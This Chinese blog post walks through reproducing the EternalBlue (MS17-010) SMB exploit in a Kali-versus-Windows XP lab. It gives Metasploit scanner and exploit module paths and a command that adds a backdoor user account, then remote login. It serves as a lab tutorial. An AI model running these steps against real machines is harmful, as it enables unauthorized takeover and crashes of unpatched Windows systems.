永恒之蓝(msf17010)kali复现

前言

2017年全球范围内爆发基于Windows网络共享协议进行攻击传播的蠕虫恶意代码,这是不法分子通过改造之前泄露的NSA黑客武器库中“永恒之蓝”攻击程序发起的网络攻击事件。多个高校校内网、大型企业内网和政府机构专网中招,永恒之蓝是在Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

环境

靶机:winxp

攻击机:kali

在同一局域网内能够相互ping通

实操

sudo提权 启动msfconsole

这里的启动图是随机的图样

 搜索ms17_010模块

 建立监听器 使用扫描模块:use auxiliary/scanner/smb/smb_ms17_010

show options配置

 补充ip地址

 exploit 也可以 run

运行 

 使用攻击模块:use exploit/windows/smb/ms17_010_eternalblue

或者直接 use 2

show options设置好ip

 打出蓝屏

使用模块:use auxiliary/admin/smb/ms17_010_command 

use 0

show options

配置好ip和命令

 set COMMAND net user Akira abc123 /add

已经添加进去了

远程连接

 出现问题

 更改权限

 

 然后远程连接上线

原文地址:https://www.cnblogs.com/yiyegugu/p/15056291.html